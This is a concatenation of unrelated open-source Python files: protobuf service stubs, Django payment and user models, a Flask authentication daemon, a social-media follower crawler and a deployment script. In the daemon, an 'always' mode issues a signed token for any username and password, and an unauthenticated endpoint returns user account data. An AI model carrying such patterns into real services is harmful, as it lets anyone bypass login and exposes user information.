_sym_db.RegisterMessage(ComponentName)
GraphJSON = _reflection.GeneratedProtocolMessageType('GraphJSON', (_message.Message,), {
'DESCRIPTOR' : _GRAPHJSON,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.GraphJSON)
})
_sym_db.RegisterMessage(GraphJSON)
StyleJSON = _reflection.GeneratedProtocolMessageType('StyleJSON', (_message.Message,), {
'DESCRIPTOR' : _STYLEJSON,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.StyleJSON)
})
_sym_db.RegisterMessage(StyleJSON)
ndArray = _reflection.GeneratedProtocolMessageType('ndArray', (_message.Message,), {
'DESCRIPTOR' : _NDARRAY,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ndArray)
})
_sym_db.RegisterMessage(ndArray)
Matrix = _reflection.GeneratedProtocolMessageType('Matrix', (_message.Message,), {
'DESCRIPTOR' : _MATRIX,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.Matrix)
})
_sym_db.RegisterMessage(Matrix)
Entry = _reflection.GeneratedProtocolMessageType('Entry', (_message.Message,), {
'DESCRIPTOR' : _ENTRY,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.Entry)
})
_sym_db.RegisterMessage(Entry)
ServePref = _reflection.GeneratedProtocolMessageType('ServePref', (_message.Message,), {
'DESCRIPTOR' : _SERVEPREF,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ServePref)
})
_sym_db.RegisterMessage(ServePref)
ServePrefs = _reflection.GeneratedProtocolMessageType('ServePrefs', (_message.Message,), {
'DESCRIPTOR' : _SERVEPREFS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.ServePrefs)
})
_sym_db.RegisterMessage(ServePrefs)
RunTimeParams = _reflection.GeneratedProtocolMessageType('RunTimeParams', (_message.Message,), {
'InputsEntry' : _reflection.GeneratedProtocolMessageType('InputsEntry', (_message.Message,), {
'DESCRIPTOR' : _RUNTIMEPARAMS_INPUTSENTRY,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.RunTimeParams.InputsEntry)
})
,
'DESCRIPTOR' : _RUNTIMEPARAMS,
'__module__' : 'graph_pb2'
# @@protoc_insertion_point(class_scope:graph.RunTimeParams)
})
_sym_db.RegisterMessage(RunTimeParams)
_sym_db.RegisterMessage(RunTimeParams.InputsEntry)
_MATRIX.fields_by_name['data']._options = None
_RUNTIMEPARAMS_INPUTSENTRY._options = None
_SERVEGRAPH = _descriptor.ServiceDescriptor(
name='ServeGraph',
full_name='graph.ServeGraph',
file=DESCRIPTOR,
index=0,
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_start=1074,
serialized_end=1690,
methods=[
_descriptor.MethodDescriptor(
name='LoadCustomPnl',
full_name='graph.ServeGraph.LoadCustomPnl',
index=0,
containing_service=None,
input_type=_PNLPATH,
output_type=_NULLARGUMENT,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='LoadScript',
full_name='graph.ServeGraph.LoadScript',
index=1,
containing_service=None,
input_type=_SCRIPTPATH,
output_type=_SCRIPTCOMPOSITIONS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='LoadGraphics',
full_name='graph.ServeGraph.LoadGraphics',
index=2,
containing_service=None,
input_type=_SCRIPTPATH,
output_type=_STYLEJSON,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetLoggableParameters',
full_name='graph.ServeGraph.GetLoggableParameters',
index=3,
containing_service=None,
input_type=_COMPONENTNAME,
output_type=_PARAMETERLIST,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetCompositions',
full_name='graph.ServeGraph.GetCompositions',
index=4,
containing_service=None,
input_type=_NULLARGUMENT,
output_type=_SCRIPTCOMPOSITIONS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetComponents',
full_name='graph.ServeGraph.GetComponents',
index=5,
containing_service=None,
input_type=_GRAPHNAME,
output_type=_SCRIPTCOMPONENTS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='GetJSON',
full_name='graph.ServeGraph.GetJSON',
index=6,
containing_service=None,
input_type=_GRAPHNAME,
output_type=_GRAPHJSON,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='HealthCheck',
full_name='graph.ServeGraph.HealthCheck',
index=7,
containing_service=None,
input_type=_NULLARGUMENT,
output_type=_HEALTHSTATUS,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='UpdateStylesheet',
full_name='graph.ServeGraph.UpdateStylesheet',
index=8,
containing_service=None,
input_type=_STYLEJSON,
output_type=_NULLARGUMENT,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='RunComposition',
full_name='graph.ServeGraph.RunComposition',
index=9,
containing_service=None,
input_type=_RUNTIMEPARAMS,
output_type=_ENTRY,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_SERVEGRAPH)
DESCRIPTOR.services_by_name['ServeGraph'] = _SERVEGRAPH
# @@protoc_insertion_point(module_scope)
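The `ndArray` message above carries a `shape` field plus a flat `data` list. As a dependency-free, hypothetical sketch (names are illustrative, not part of the generated module), the round-trip that convention implies looks like this:

```python
# Hypothetical helpers mirroring graph.ndArray's shape + flat-data layout.
def flatten(nested):
    """Flatten a 2-D list into (shape, data), the way ndArray stores arrays."""
    rows, cols = len(nested), len(nested[0])
    return (rows, cols), [x for row in nested for x in row]

def unflatten(shape, data):
    """Rebuild the nested rows from the stored shape and flat data."""
    rows, cols = shape
    return [data[r * cols:(r + 1) * cols] for r in range(rows)]

shape, data = flatten([[1.0, 2.0], [3.0, 4.0]])
print(shape, data)              # (2, 2) [1.0, 2.0, 3.0, 4.0]
print(unflatten(shape, data))   # [[1.0, 2.0], [3.0, 4.0]]
```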
# ---- file: setup.py | repo: enricobacis/timeme | license: MIT ----
from setuptools import setup
with open('README.rst') as README:
long_description = README.read()
long_description = long_description[long_description.index('Description'):]
setup(name='timeme',
version='0.1.1',
description='Decorator that prints the running time of a function',
long_description=long_description,
url='http://github.com/enricobacis/timeme',
author='Enrico Bacis',
author_email='enrico.bacis@gmail.com',
license='MIT',
packages=['timeme'],
keywords='time timing function decorator'
)
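The `index('Description')` slice above trims everything before the README's "Description" heading so PyPI shows only the useful part. A minimal, self-contained illustration of that idiom (the README text here is hypothetical):

```python
# Hypothetical README text; only illustrates the slicing idiom used above.
readme = "badge line\n\nDescription\n===========\nPrints timings."

# Keep everything from the 'Description' heading onward.
long_description = readme[readme.index("Description"):]
print(long_description.splitlines()[0])  # the heading is now the first line
```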
# ---- file: billing/models/pin_models.py | repo: litchfield/merchant | license: BSD-3-Clause ----
from django.db import models
try:
from django.contrib.auth import get_user_model
except ImportError: # django < 1.5
from django.contrib.auth.models import User
else:
User = get_user_model()
class PinCard(models.Model):
token = models.CharField(max_length=32, db_index=True, editable=False)
display_number = models.CharField(max_length=20, editable=False)
expiry_month = models.PositiveSmallIntegerField()
expiry_year = models.PositiveSmallIntegerField()
scheme = models.CharField(max_length=20, editable=False)
first_name = models.CharField(max_length=255)
last_name = models.CharField(max_length=255)
address_line1 = models.CharField(max_length=255)
address_line2 = models.CharField(max_length=255, blank=True)
address_city = models.CharField(max_length=255)
address_postcode = models.CharField(max_length=20)
address_state = models.CharField(max_length=255)
address_country = models.CharField(max_length=255)
created_at = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User, related_name='pin_cards', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Card %s' % self.display_number
class PinCustomer(models.Model):
token = models.CharField(unique=True, max_length=32)
card = models.ForeignKey(PinCard, related_name='customers')
email = models.EmailField()
created_at = models.DateTimeField()
user = models.ForeignKey(User, related_name='pin_customers', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Customer %s' % self.email
class PinCharge(models.Model):
token = models.CharField(unique=True, max_length=32, editable=False)
card = models.ForeignKey(PinCard, related_name='charges', editable=False)
customer = models.ForeignKey(PinCustomer, related_name='customers', null=True, blank=True, editable=False)
success = models.BooleanField()
amount = models.DecimalField(max_digits=16, decimal_places=2)
currency = models.CharField(max_length=3)
description = models.CharField(max_length=255)
email = models.EmailField()
ip_address = models.GenericIPAddressField(blank=True, null=True)
created_at = models.DateTimeField()
status_message = models.CharField(max_length=255)
error_message = models.CharField(max_length=255)
user = models.ForeignKey(User, related_name='pin_charges', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Charge %s' % self.email
class PinRefund(models.Model):
token = models.CharField(unique=True, max_length=32)
charge = models.ForeignKey(PinCharge, related_name='refunds')
success = models.BooleanField()
amount = models.DecimalField(max_digits=16, decimal_places=2)
currency = models.CharField(max_length=3)
created_at = models.DateTimeField()
status_message = models.CharField(max_length=255)
error_message = models.CharField(max_length=255)
user = models.ForeignKey(User, related_name='pin_refunds', blank=True, null=True)
class Meta:
app_label = 'billing'
def __unicode__(self):
return 'Refund %s' % self.charge.email
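The charge and refund amounts above are stored as fixed-point decimals (`max_digits=16, decimal_places=2`). A small stdlib sketch, with hypothetical amounts, of why `Decimal` rather than `float` fits money columns like these:

```python
from decimal import Decimal, ROUND_HALF_UP

# Hypothetical amounts; mirrors the two-decimal-place convention of the
# DecimalField(max_digits=16, decimal_places=2) columns above.
charge = Decimal("19.99")
refund = charge / 3  # a partial refund split three ways

# Quantize back to cents so the value fits a decimal_places=2 column.
refund = refund.quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)
print(refund)  # 6.66
```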
# ---- file: onaws/__init__.py | repo: bbhunter/onaws | license: MIT ----
'''Simple library to check if a hostname belongs to AWS IP space.'''
__version__ = '0.0.12'
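The package body is not included in this `__init__`, so as a hypothetical sketch of the check its docstring describes — resolve a host and test each address against published AWS CIDR blocks (the ranges below are a hardcoded sample, not the real feed):

```python
import ipaddress
import socket

# Hypothetical sample of AWS CIDR blocks; the real list is published at
# https://ip-ranges.amazonaws.com/ip-ranges.json
AWS_RANGES = [ipaddress.ip_network(c) for c in ("52.95.0.0/16", "54.230.0.0/15")]

def is_aws_ip(ip: str) -> bool:
    """Return True if the address falls inside any known AWS block."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in AWS_RANGES)

def is_aws_host(hostname: str) -> bool:
    """Resolve a hostname and test every address it resolves to."""
    infos = socket.getaddrinfo(hostname, None)
    return any(is_aws_ip(info[4][0]) for info in infos)

print(is_aws_ip("52.95.1.1"))   # True: inside 52.95.0.0/16
print(is_aws_ip("192.0.2.1"))   # False: documentation range, not AWS
```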
# ---- file: timemachines/skaters/orbt/orbitlgtskaterfactory.py | repo: iklasky/timemachines | license: MIT ----
from timemachines.skaters.orbt.orbitinclusion import using_orbit
if using_orbit:
from timemachines.skaters.orbt.orbitwrappers import orbit_lgt_iskater
from timemachines.skatertools.utilities.conventions import Y_TYPE, A_TYPE, R_TYPE, E_TYPE, T_TYPE
from timemachines.skatertools.batch.batchskater import batch_skater_factory
def orbit_lgt_skater_factory(y: Y_TYPE, s, k: int, a: A_TYPE = None, t: T_TYPE = None, e: E_TYPE = None, r: R_TYPE = None,
emp_mass=0.0,
seasonality=None):
return batch_skater_factory(y=y, s=s, k=k, a=a, t=t, e=e, r=r, emp_mass=emp_mass,
iskater=orbit_lgt_iskater,
iskater_kwargs={'seasonality': seasonality},
min_e=0, n_warm=20)
def orbit_lgt_12(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y=y, s=s, k=k, a=a,t=t,e=e, seasonality=12)
def orbit_lgt_24(y,s,k,a=None, t=None,e=None):
return orbit_lgt_skater_factory(y, s, k, a=a,t=t,e=e, seasonality=24)
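`orbit_lgt_12` and `orbit_lgt_24` are thin wrappers that pin `seasonality` on the underlying factory. The same pattern can be sketched with a stdlib `functools.partial`, independent of orbit itself (the factory below is a hypothetical stand-in, not the real skater):

```python
from functools import partial

# Hypothetical stand-in for a skater factory: takes data plus a
# seasonality knob and returns a configured result.
def skater_factory(y, k, seasonality=None):
    return {"horizon": k, "seasonality": seasonality, "n": len(y)}

# Pin the seasonality the way orbit_lgt_12 / orbit_lgt_24 do above.
skater_12 = partial(skater_factory, seasonality=12)
skater_24 = partial(skater_factory, seasonality=24)

print(skater_12([1.0, 2.0, 3.0], k=5)["seasonality"])  # 12
```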
# ---- file: project/WeiboTest/SpiderMain.py | repo: zhengbomo/python_practice | license: MIT ----
#!/usr/bin/python
# -*- coding:utf-8 -*-
from Spider import Spider
# Entry point
spider = Spider()
fans = spider.get_my_fans()
for fan in fans:
spider.user_crawl(fan.user_id)
spider.status_crawl(fan.user_id)
followers = spider.get_my_follower()
for follower in followers:
    spider.user_crawl(follower.user_id)
    spider.status_crawl(follower.user_id)
# ---- file: backpack/extensions/secondorder/diag_ggn/permute.py | repo: jabader97/backpack | license: MIT ----
"""Module defining DiagGGNPermute."""
from backpack.core.derivatives.permute import PermuteDerivatives
from backpack.extensions.secondorder.diag_ggn.diag_ggn_base import DiagGGNBaseModule
class DiagGGNPermute(DiagGGNBaseModule):
"""DiagGGN extension of Permute."""
def __init__(self):
"""Initialize."""
super().__init__(derivatives=PermuteDerivatives())
| 31.75 | 84 | 0.76378 | 36 | 381 | 7.777778 | 0.694444 | 0.085714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125984 | 381 | 11 | 85 | 34.636364 | 0.840841 | 0.191601 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7e87f76640610e9de62b60abb07ac310224902a8 | 309 | py | Python | hcap_utils/contrib/allauth/login_form.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | [
"MIT"
] | null | null | null | hcap_utils/contrib/allauth/login_form.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | [
"MIT"
] | 31 | 2020-04-11T13:38:17.000Z | 2021-09-22T18:51:11.000Z | hcap_utils/contrib/allauth/login_form.py | fabiommendes/capacidade_hospitalar | 4f675b574573eb3f51e6be8a927ea230bf2712c7 | [
"MIT"
] | 1 | 2020-04-08T17:04:39.000Z | 2020-04-08T17:04:39.000Z | from allauth.account.forms import LoginForm as AllauthLoginForm
class LoginForm(AllauthLoginForm):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
del self.fields["login"].widget.attrs["placeholder"]
del self.fields["password"].widget.attrs["placeholder"]
| 34.333333 | 63 | 0.702265 | 34 | 309 | 6.147059 | 0.647059 | 0.095694 | 0.124402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15534 | 309 | 8 | 64 | 38.625 | 0.800766 | 0 | 0 | 0 | 0 | 0 | 0.113269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0.166667 | 0.166667 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7e935ec5d2ebb9f636c96a59cc60b230513b416f | 3,434 | py | Python | apps/user_app/models.py | lightless233/npiss | 8338f50d971600fe2b2366836ca2fb543f2276d5 | [
"MIT"
] | 1 | 2016-11-22T13:25:02.000Z | 2016-11-22T13:25:02.000Z | apps/user_app/models.py | LiGhT1EsS/npiss | 8338f50d971600fe2b2366836ca2fb543f2276d5 | [
"MIT"
] | 4 | 2020-06-05T17:28:20.000Z | 2022-03-11T23:15:49.000Z | apps/user_app/models.py | lightless233/npiss | 8338f50d971600fe2b2366836ca2fb543f2276d5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
# coding: utf8
from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.hashers import make_password, check_password
__author__ = 'lightless'
__email__ = 'root@lightless.me'
class PissUser(models.Model):
"""
Stores user information.
"""
class Meta:
db_table = "piss_users"
username = models.CharField(max_length=64, null=False, blank=False, unique=True)
password = models.CharField(max_length=512, null=False, blank=False)
email = models.CharField(max_length=64, null=False, blank=False, unique=True)
token = models.CharField(max_length=64, unique=True, default="")
status = models.PositiveSmallIntegerField(default=9001, blank=False, null=False)
last_login_time = models.DateTimeField(default=None, null=True, blank=True)
last_login_ip = models.CharField(max_length=16, blank=True)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
is_deleted = models.BooleanField(default=False)
def save_password(self, new_password):
self.password = make_password(new_password)
def verify_password(self, input_password):
return check_password(input_password, self.password)
def get_user_status(self):
status_dict = {
9001: {"message": u"User not activated"},
9002: {"message": u"User active"},
9003: {"message": u"User banned from logging in"},
}
try:
return status_dict[self.status]
except KeyError:
return "Unknown Status"
def __str__(self):
return "<{username}, {status}>".format(username=self.username, status=self.get_user_status())
class PissActiveCode(models.Model):
"""
Stores activation code information.
"""
class Meta:
db_table = "piss_active_code"
# user_id records which user used this activation code; set to 0 if unused
user_id = models.BigIntegerField(null=False, blank=False, default=0)
active_code = models.CharField(max_length=64, null=False, blank=False, unique=True)
used = models.BooleanField(null=False, blank=False, default=False)
used_time = models.DateTimeField(default=None, null=True)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
is_deleted = models.BooleanField(default=False)
def get_code_status(self):
code_status = {
True: u"Activation code no longer valid",
False: u"Activation code valid",
}
return code_status[self.used]
def use_active_code(self):
self.used = True
def __str__(self):
return "<{code}-{used}>".format(code=self.active_code, used=self.used)
class PissUserExtra(models.Model):
"""
Stores extra user information.
"""
class Meta:
db_table = "piss_user_extra"
user_id = models.BigIntegerField()
access_key = models.CharField(max_length=40, blank=True)
secret_key = models.CharField(max_length=40, blank=True)
domain = models.CharField(max_length=255, blank=True)
bucket_name = models.CharField(max_length=64, blank=True)
# If this field is True, use the Qiniu-related info and links
# If this field is False, use this site's URL and 302-redirect to the Qiniu link
use_qiniu = models.BooleanField(default=True)
created_time = models.DateTimeField(auto_now_add=True)
updated_time = models.DateTimeField(auto_now=True)
is_deleted = models.BooleanField(default=False)
def __str__(self):
        return "<{user}-{qiniu}>".format(user=self.user_id, qiniu=self.use_qiniu)
| 31.796296 | 101 | 0.689284 | 423 | 3,434 | 5.361702 | 0.27896 | 0.066138 | 0.079365 | 0.10582 | 0.387125 | 0.314815 | 0.314815 | 0.279541 | 0.246032 | 0.246032 | 0 | 0.016275 | 0.194817 | 3,434 | 107 | 102 | 32.093458 | 0.803978 | 0.043972 | 0 | 0.220588 | 0 | 0 | 0.056329 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.088235 | 0.044118 | 0.058824 | 0.735294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
7e9894e1fe1b381787e323f05a879ce7b9f749fc | 2,478 | py | Python | nostrild/nostrild.py | nibalizer/galileo | f5d100adcfaa238d98ec2df93040eafc4d9e7420 | [
"Apache-2.0"
] | 1 | 2015-01-11T04:32:57.000Z | 2015-01-11T04:32:57.000Z | nostrild/nostrild.py | nibalizer/galileo | f5d100adcfaa238d98ec2df93040eafc4d9e7420 | [
"Apache-2.0"
] | 1 | 2015-01-12T01:17:07.000Z | 2015-01-12T01:17:07.000Z | nostrild/nostrild.py | nibalizer/galileo | f5d100adcfaa238d98ec2df93040eafc4d9e7420 | [
"Apache-2.0"
] | 2 | 2015-01-17T00:52:39.000Z | 2017-09-09T05:42:18.000Z | # nostrild
# authentication and user info daemon
import getent
import os
import yaml
import ldap
from itsdangerous import TimestampSigner
from flask import Flask, abort, request, jsonify
from flask_cors import CORS
app = Flask(__name__)
app.config['CORS_HEADERS'] = 'Content-Type'
cors = CORS(app)
def always_auth():
req = request.get_json(force=True)
if req.get('user') is None:
abort(400, "You must specify a user")
if req.get('password') is None:
abort(400, "You must specify a password")
secret = s.sign(req['user'])
return secret
def ldap_auth():
req = request.get_json(force=True)
if req.get('user') is None:
abort(400, "You must specify a user")
if req.get('password') is None:
abort(400, "You must specify a password")
con = ldap.initialize("ldap://" + conf['ldap_server'])
con.start_tls_s()
try:
dn = "uid={0},{1}".format(req['user'], conf['search_scope'])
pw = "{0}".format(req['password'])
con.simple_bind_s( dn, pw )
success = True
except ldap.LDAPError:
success = False
finally:
con.unbind()
if success:
secret = s.sign(req['user'])
return secret
else:
abort(400, "Invalid username or password")
@app.route("/")
def hello():
return "nostrild: authentication for snot"
@app.route("/auth", methods = ["POST"])
def auth():
print request.json
if conf['auth_scheme'] == 'always':
secret = always_auth()
elif conf['auth_scheme'] == 'ldap':
secret = ldap_auth()
return jsonify({"secret_key": secret,
"timeout": conf['auth_timeout']})
@app.route("/user/<name>")
def username(name):
"""
return getent info and snotsig
"""
try:
passwd = dict(getent.passwd(name))
except TypeError:
abort(400, "Invalid user")
snotsig_path = '/home/{0}/solaris/.snotsig'.format(name)
sig_path = '/home/{0}/solaris/.snotsig'.format(name)
if os.path.isfile(snotsig_path):
with open(snotsig_path) as f:
snotsig = f.read()
elif os.path.isfile(sig_path):
with open(sig_path) as f:
snotsig = f.read()
#TODO check linux homedir as well
else:
snotsig = ""
return jsonify({"passwd": passwd, "snotsig": snotsig})
if __name__ == "__main__":
with open('config.yaml') as f:
conf = yaml.safe_load(f.read())
s = TimestampSigner(conf['secret_key'])
app.run(debug=True, port=conf['port'])
| 22.324324 | 64 | 0.619048 | 332 | 2,478 | 4.509036 | 0.325301 | 0.032064 | 0.029392 | 0.037408 | 0.281897 | 0.281897 | 0.281897 | 0.197729 | 0.162993 | 0.162993 | 0 | 0.012105 | 0.233253 | 2,478 | 110 | 65 | 22.527273 | 0.775789 | 0.03067 | 0 | 0.298701 | 0 | 0 | 0.198129 | 0.022109 | 0 | 0 | 0 | 0.009091 | 0 | 0 | null | null | 0.103896 | 0.090909 | null | null | 0.012987 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7eb2e5d8b39a38645fd5ca261b5ad38bc6b3a64e | 17,580 | py | Python | deploy.py | NASA-PDS/planetarydata.org | 16731a251c22408b433117f7f01e29d004f11467 | [
"Apache-2.0"
] | null | null | null | deploy.py | NASA-PDS/planetarydata.org | 16731a251c22408b433117f7f01e29d004f11467 | [
"Apache-2.0"
] | 5 | 2021-03-19T21:41:19.000Z | 2022-02-11T14:55:14.000Z | deploy.py | NASA-PDS/planetarydata.org | 16731a251c22408b433117f7f01e29d004f11467 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
# Copyright 2014 California Institute of Technology. ALL RIGHTS
# RESERVED. U.S. Government Sponsorship acknowledged.
#
# deploy.py - Deploy the IPDA site into operations
import argparse, sys, logging, os, os.path, re, subprocess, pwd, urllib2, contextlib, tempfile, tarfile, string, random
import shutil
reload(sys)
sys.setdefaultencoding('utf-8')
_bufsiz = 512
_buildoutCache = u'/apps/ipdasite/buildout'
_setupToolsVersion = u'23.0.0'
_virtualEnvVersion = u'15.0.2'
_buildoutVersion = u'2.5.2'
_virtualEnvURL = u'https://pypi.python.org/packages/source/v/virtualenv/virtualenv-{}.tar.gz'.format(_virtualEnvVersion)
_cHeader = '''#ifdef __cplusplus
extern "C"
#endif
'''
class DeploymentError(Exception):
pass
def _setupLogging():
logging.basicConfig(level=logging.DEBUG, format=u'%(asctime)s %(levelname)-8s %(message)s',
filename=u'deploy.log', filemode='w')
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter(u'%(message)s'))
logging.getLogger('').addHandler(console)
logging.debug(u'Logging configured')
def _getArgParser():
p = argparse.ArgumentParser(
description=u'Deploys the IPDA web site and services in this directory. If a previous installation'
u' exists, give its path on the command-line, and its content will be migrated over. Otherwise,'
u' an empty, content-free website will be deployed.',
epilog=u'For more information or help, contact sean.kelly@jpl.nasa.gov.'
)
p.add_argument(u'existing', nargs='?', help=u'Path to existing IPDA website installation for content')
p.add_argument(u'--buildout-cache', metavar=u'PATH', default=_buildoutCache,
help=u'Use cached downloads/eggs/extends in %(metavar)s instead of %(default)s')
p.add_argument(u'--libdir', metavar=u'PATH', action='append',
help=u'Add %(metavar)s to the list of dirs to check for libraries; repeat this option as needed')
g = p.add_argument_group(u'Internet', u'Hostnames and ports.')
g.add_argument(u'--public-hostname', metavar=u'HOSTNAME',
help=u'Override the default hostname "%(default)s" with %(metavar)s', default=u'planetarydata.org')
g.add_argument(u'--http-port', metavar=u'PORTNUM', type=int, default=80,
help=u'Override the default HTTP port %(default)d with %(metavar)s')
g.add_argument(u'--https-port', metavar=u'PORTNUM', type=int, default=443,
help=u'Override the default HTTPS port %(default)d with %(metavar)s')
g = p.add_argument_group(u'Usernames & Passwords', u'Random passwords will be generated unless specified below.')
g.add_argument(u'--supervisor-user', metavar=u'USERNAME', default=u'supervisor-admin',
help=u'Override the Supervisor username "%(default)s" with %(metavar)s')
g.add_argument(u'--supervisor-password', metavar=u'PASSWORD', help='Use %(metavar)s insetad of a random password')
g.add_argument(u'--tomcat-user', metavar=u'USERNAME', default=u'tomcat-admin',
help=u'Override the Tomcat username "%(default)s" with %(metavar)s')
g.add_argument(u'--tomcat-password', metavar=u'PASSWORD', help=u'Use %(metavar)s instead of a random password')
g.add_argument(u'--zope-user', metavar=u'USERNAME', default=u'zope-admin',
help=u'Override the Zope app server username "%(default)s" with %(metavar)s')
g.add_argument(u'--zope-password', metavar=u'PASSWORD', help=u'Use %(metavar)s instead of a random password')
g = p.add_argument_group(u'Executables', u'These will be searched on the executable PATH unless overridden.')
g.add_argument(u'--with-java', metavar=u'PATH', help=u'Use the Java language at %(metavar)s')
g.add_argument(u'--with-lynx', metavar=u'PATH', help=u'Use the lynx plain-text browser at %(metavar)s')
g.add_argument(u'--with-nginx', metavar=u'PATH', help=u'Use the nginx web server at %(metavar)s')
g.add_argument(u'--with-pdftohtml', metavar=u'PATH', help=u'Use the pdftohtml converter at %(metavar)s')
g.add_argument(u'--with-varnishd', metavar=u'PATH', help=u'Use the varnishd cache at %(metavar)s')
g.add_argument(u'--with-wvHtml', metavar=u'PATH', help=u'Use the wvHtml Word converter at %(metavar)s')
g.add_argument(u'--with-python', metavar=u'PATH', help=u'Use the Python language at %(metavar)s',
default=sys.executable)
return p
def _findExecutable(name, location=None):
logging.debug(u'Looking for executable "%s"%s', name,
u' (Possibly at {})'.format(location) if location is not None else u'')
if location:
if not os.path.isfile(location):
raise DeploymentError(u'The "{}" at "{}" is not a file'.format(name, location))
if not os.access(location, os.X_OK):
raise DeploymentError(u'The "{}" at "{}" is not executable'.format(name, location))
return location
for d in os.environ['PATH'].split(u':'):
candidate = os.path.join(d, name)
if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
return candidate
raise DeploymentError(u'Executable "{}" not found in PATH'.format(name))
def _checkVarnish(path):
logging.info('Checking varnishd version')
output = subprocess.check_output([path, u'-V'], stderr=subprocess.STDOUT)
if re.match(ur'varnishd \(varnish-3', output) is None:
raise DeploymentError(u'Varnish at "{}" needs to be version 3+'.format(path))
def _findExecutables(namespace):
logging.info('Finding dependent executables')
java = _findExecutable(u'java', namespace.with_java)
logging.info(u'Using java at %s', java)
nginx = _findExecutable(u'nginx', namespace.with_nginx)
logging.info(u'Using nginx at %s', nginx)
lynx = _findExecutable(u'lynx', namespace.with_lynx)
logging.info(u'Using lynx at %s', lynx)
pdftohtml = _findExecutable(u'pdftohtml', namespace.with_pdftohtml)
logging.info(u'Using pdftohtml at %s', pdftohtml)
varnishd = _findExecutable(u'varnishd', namespace.with_varnishd)
logging.info(u'Using varnishd at %s', varnishd)
wvHtml = _findExecutable(u'wvHtml', namespace.with_wvHtml)
logging.info(u'Using wvHtml at %s', wvHtml)
python = _findExecutable(u'python2.7', namespace.with_python)
logging.info(u'Using python2.7 at %s', python)
return dict(java=java, nginx=nginx, lynx=lynx, pdftohtml=pdftohtml, python=python, varnishd=varnishd, wvHtml=wvHtml)
def _checkLibrary(lib, func, libdirs):
logging.debug('Checking for %s in %s (extra libdirs: %r)', func, lib, libdirs)
fd, fn = tempfile.mkstemp(suffix='.c')
out = os.fdopen(fd, 'w')
out.write(_cHeader)
out.write('char %s();\nint main() {\nreturn %s();}\n' % (func, func))
out.close()
args = ['cc', fn, '-l{}'.format(lib)]
args.extend(['-L{}'.format(i) for i in libdirs])
_execAndLog(args)
os.remove('a.out')
